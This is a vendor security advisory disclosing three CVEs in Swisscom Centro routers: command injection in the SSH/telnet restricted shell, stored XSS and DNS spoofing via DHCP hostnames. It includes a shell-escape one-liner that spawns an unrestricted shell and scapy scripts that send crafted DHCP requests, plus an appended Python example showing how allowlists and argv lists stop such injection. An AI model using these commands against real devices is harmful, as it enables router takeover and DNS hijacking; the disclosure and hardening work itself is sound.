####################################################################################
#
# SWISSCOM CSIRT ADVISORY
# https://www.swisscom.ch/en/about/company/portrait/network/security/bug-bounty.html
#
####################################################################################
#
# Product:  Swisscom Centro Grande
# Vendor:   Swisscom (Schweiz) AG
# CVE:      CVE-2019-19940, CVE-2019-19941, CVE-2019-19942
# Subject:  Remote Code Execution
# Risk:     Medium
# Effect:   Exploitable in Local Network
# Author:   Cyril Mueller
# Coord.:   Florian Badertscher
# Date:     21.01.2020
#
####################################################################################

Affected
--------

Vulnerable:
  * Centro Grande 6.14.06 and below
  * Centro Business 1.0 below 7.10.18
  * Centro Business 2.0 below 8.02.04

Not vulnerable:
  * Centro Grande version 6.16.12
  * Centro Business 1.0 version 7.10.18
  * Centro Business 2.0 version 8.02.04

Summary
-------

Multiple vulnerabilities were fixed in the Centro Grande (ADB) and Centro
Business (ADB) line of products.

CVE-2019-19940 Command injection:
  * Centro Grande family (ADB), below version 6.14.06

CVE-2019-19941 Stored XSS:
  * Centro Grande family (ADB), below version 6.14.06

CVE-2019-19942 DNS Spoofing:
  * Centro Grande family (ADB), below version 6.14.06
  * Centro Business 1.0 (ADB), below version 7.10.18
  * Centro Business 2.0 (2.0), below version 8.02.04

CVE-2019-19940 Command Injection
--------------------------------

Incorrect input sanitization in the text-oriented user interfaces (telnet, SSH)
of Swisscom Centro Grande 6.14.06 and below allows remote authenticated users to
execute arbitrary commands via command injection.

Once a user is connected and authenticated to the router over SSH, the user is
greeted by a restricted shell (CLISH). It uses a configuration to whitelist and
define commands and their arguments.
The whitelist is not strict enough, and backslashes can be used to escape from
quoted strings:

ADB# ping \
sh: syntax error: unterminated quoted string

It is possible to execute shell commands as the user "admin". The following
command spawns an unrestricted shell, using the whitelisted tcpdump command:

ADB# tcpdump enable file filter br0 \ "; sh -c sh \"
ERROR: Output File has to be stored in a connected mounted USB memory device (ex. /mnt/sda1/ )
HELP:
[CUT]

BusyBox v1.17.3 (2015-09-23 17:35:23 CEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/root $ echo $USER
admin

CVE-2019-19941 Stored XSS
-------------------------

Missing output sanitization in Swisscom Centro Grande 6.14.06 and below allows a
remote attacker with local network access to inject JavaScript code into the web
interface via crafted host names in DHCP requests.

The injected code is sent in the 'hostname' field of the request. The hostname
is stored temporarily on the router and is embedded into the HTML code of the
administrator web interface on the overview page (the first page after login)
and on the device overview page.

The attack needs some time until the data cache is updated. In a few cases the
data is properly escaped and displayed correctly, but this happens rarely. The
payload (hostname) appears to be limited to ~72 characters.

The following Python script sends a DHCP request and waits for the answer. After
a run, the hostname will be stored.

from scapy.all import BOOTP, DHCP, Ether, IP, UDP, conf, get_if_raw_hwaddr, srp


def send_dhcp_request(hostname):
    '''
    Send one DHCP request and wait for an answer.

    :param hostname: The hostname to send (DHCP option 12)
    '''
    # The reply is not addressed to our 0.0.0.0 source address, so do not let
    # scapy discard answers whose IP does not match the request.
    conf.checkIPaddr = False
    # Raw hardware address of the sending interface, used as the BOOTP chaddr.
    fam, hw = get_if_raw_hwaddr(conf.iface)
    dhcp_request = (Ether(dst="ff:ff:ff:ff:ff:ff") /
                    IP(src="0.0.0.0", dst="255.255.255.255") /
                    UDP(sport=68, dport=67) /
                    BOOTP(chaddr=hw) /
                    DHCP(options=[("message-type", "request"),
                                  ("hostname", hostname),
                                  "end"]))
    # Send at layer 2 and wait for the server's reply; the timeout keeps the
    # script from blocking forever if no server answers.
    answered, unanswered = srp(dhcp_request, timeout=5)
    return answered


# The hostname argument is left empty here; the advisory does not give the payload.
send_dhcp_request('')

CVE-2019-19942 DNS Spoofing
---------------------------

Missing hostname validation in Swisscom Centro Grande below version 6.16.12,
Centro Business 1.0 (ADB) below version 7.10.18 and Centro Business 2.0 below
version 8.02.04 allows a remote attacker with local network access to inject
its local IP address as a domain entry into the DNS service of the router via
crafted host names in DHCP requests.

The following proof-of-concept Python script sends a DHCP request. No DHCP
discovery is required if the currently assigned IP address is used. The hostname
field of the DHCP message is set to the domains "example.com" and
"www.example.com":

from scapy.all import BOOTP, DHCP, Ether, IP, UDP, conf, get_if_raw_hwaddr, srp


def send_dhcp_request(hostname):
    '''
    Send one DHCP request and wait for an answer.

    :param hostname: The hostname to send (DHCP option 12)
    '''
    conf.checkIPaddr = False                 # reply is not addressed to 0.0.0.0
    fam, hw = get_if_raw_hwaddr(conf.iface)  # our MAC, used as BOOTP chaddr
    dhcp_request = (Ether(dst="ff:ff:ff:ff:ff:ff") /
                    IP(src="0.0.0.0", dst="255.255.255.255") /
                    UDP(sport=68, dport=67) /
                    BOOTP(chaddr=hw) /
                    DHCP(options=[("message-type", "request"),
                                  ("hostname", hostname),
                                  "end"]))
    answered, unanswered = srp(dhcp_request, timeout=5)
    return answered


send_dhcp_request('example.com www.example.com')

After executing this script, the built-in DNS server will resolve both
www.example.com and example.com to the IP address currently assigned by the
DHCP server.

Workaround / Fix
----------------

Upgrade to the latest firmware release. No action is required for Swisscom
customers, as their devices are managed by Swisscom.
Timeline
--------

2016-01-07  Vendor notification of command injection
2016-01-11  Vendor notification of stored XSS
2016-01-19  Vendor confirmation of command injection and stored XSS
2016-03-06  Vendor notification of DNS spoofing
2016-03-21  Vendor confirmation of DNS spoofing
2016-03-30  Communication of fix completion; announcement of delayed rollout of the fix
2016-04     Rollout of fixed versions started for Centro Grande, Centro Business 1.0 and Centro Business 2.0
2017-01     Rollout of fixed versions complete for Centro Business 1.0 and Centro Business 2.0
2017-05     Rollout of fixed versions complete for Centro Grande
2017-05-27  Publication by the author
2020-01-21  Public disclosure by the vendor
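The CVE-2019-19940 section above describes a restricted shell whose argument quoting can be broken with a backslash. The following Python is an added example, not the advisory's or the vendor's CLISH code, that reproduces the quoting failure with shlex (the standard library's POSIX word splitter) and shows what a wrapper should do instead: an allowlist of accepted characters per argument and an argv list handed to the program without a shell. The command template, the regular expressions and the sample inputs are assumptions made for the demo.

```python
import re
import shlex
import subprocess

# Assumed shape of a wrapper like the one described for CVE-2019-19940: the
# user-supplied filter is dropped between double quotes in a shell command line.
NAIVE_TEMPLATE = 'tcpdump -i br0 "{arg}"'

# Hardened side: describe what is accepted, not what is blocked.
IFACE_RE = re.compile(r"[a-z][a-z0-9.]{0,14}")    # Linux interface names, max 15 chars
BPF_RE = re.compile(r"[A-Za-z0-9 .:/-]{1,128}")   # enough for host/net/port filters


def naive_quoting_preserves(arg: str) -> bool:
    """True only if the shell would see the three fixed words plus arg as one word.

    shlex.split follows POSIX word splitting, so it shows what the wrapper's
    quoting really does: a backslash before the closing quote leaves the string
    unterminated (the advisory's "unterminated quoted string"), and a quote
    inside the value closes it early so the rest becomes new words.
    """
    cmd = NAIVE_TEMPLATE.format(arg=arg)
    try:
        words = shlex.split(cmd)
    except ValueError:  # "No closing quotation"
        return False
    return words == ["tcpdump", "-i", "br0", arg]


def quoted_line_preserves(arg: str) -> bool:
    """If a shell string is unavoidable, shlex.quote makes any value one word."""
    cmd = "tcpdump -i br0 " + shlex.quote(arg)
    return shlex.split(cmd) == ["tcpdump", "-i", "br0", arg]


def build_argv(iface: str, bpf_filter: str) -> list:
    """Validate both values against the allowlist and return an argv list.

    No shell is involved, so quoting rules never apply and the filter reaches
    tcpdump as exactly one argument. The argv is fixed apart from the two
    validated values, so the user cannot add options of their own.
    """
    if not IFACE_RE.fullmatch(iface):
        raise ValueError(f"rejected interface name: {iface!r}")
    if not BPF_RE.fullmatch(bpf_filter):
        raise ValueError(f"rejected filter expression: {bpf_filter!r}")
    return ["tcpdump", "-i", iface, bpf_filter]


def is_accepted(iface: str, bpf_filter: str) -> bool:
    """Convenience wrapper: does the allowlist let this pair through?"""
    try:
        build_argv(iface, bpf_filter)
        return True
    except ValueError:
        return False


def run_capture(iface: str, bpf_filter: str, execute: bool = False):
    """Build the argv; only spawn tcpdump when execute=True (needs privileges)."""
    argv = build_argv(iface, bpf_filter)
    if execute:
        return subprocess.run(argv, check=False)  # list argv, shell=False by default
    return argv


if __name__ == "__main__":
    samples = ["port 53", "port 53\\", 'port 53"; echo injected; "', 'br0 \\ "; sh -c sh \\"']
    for s in samples:
        print(f"{s!r:40} naive={naive_quoting_preserves(s)!s:5} "
              f"quoted={quoted_line_preserves(s)!s:5} allowlist={is_accepted('br0', s)}")
```

Run it and the first sample passes all three checks while the other three fail the naive template; shlex.quote keeps each of them as a single word, but the allowlist rejects them outright, which is the right default for a restricted shell: a filter that needs quotes, semicolons or backslashes has no legitimate use there.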